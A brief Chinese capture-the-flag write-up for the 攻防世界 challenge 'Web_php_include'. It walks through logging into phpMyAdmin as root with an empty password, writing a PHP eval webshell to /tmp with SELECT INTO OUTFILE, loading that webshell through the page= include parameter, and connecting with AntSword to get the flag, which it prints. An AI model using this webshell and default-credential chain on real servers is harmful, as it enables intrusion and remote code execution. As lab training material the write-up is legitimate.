攻防世界-Web_php_include

简介: 攻防世界-Web_php_include

先用御剑扫一下

发现有phpmyadmin的登录地址

http://61.147.171.105:64507/phpmyadmin/

phpMyAdmin默认已有root用户,其默认密码为空

登陆成功后在SQL查询里执行一句话木马

select "<?php @eval($_POST['1']);?>" into outfile '/tmp/1.php'

则要连接的URL为  http://61.147.171.105:64507/?page=/tmp/1.php

使用蚁剑,先测试一下,连接成功

拿到flag

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

目录
相关文章
|
4月前
|
SQL 监控 安全
Java Web应用的安全防护与攻防策略
Java Web应用的安全防护与攻防策略
|
6月前
|
数据安全/隐私保护
攻防世界13-simple_php
攻防世界13-simple_php
|
6月前
攻防世界12-baby_web
攻防世界12-baby_web
攻防世界---baby_web
攻防世界---baby_web
|
6月前
|
数据安全/隐私保护
攻防世界web-----easyupload
攻防世界web-----easyupload
|
6月前
|
Go PHP
攻防世界web---fileinclude
攻防世界web---fileinclude
|
3月前
|
存储 PHP 数据安全/隐私保护
攻防世界 Web_php_unserialize
攻防世界 Web_php_unserialize
57 0
|
4月前
|
SQL 安全 Java
Java Web应用的安全防护与攻防深度剖析
Java Web应用的安全防护与攻防深度剖析
|
4月前
|
SQL 监控 安全
Java Web应用的安全防护与攻防策略
Java Web应用的安全防护与攻防策略
攻防世界---web---warmup
攻防世界---web---warmup
攻防世界---web---warmup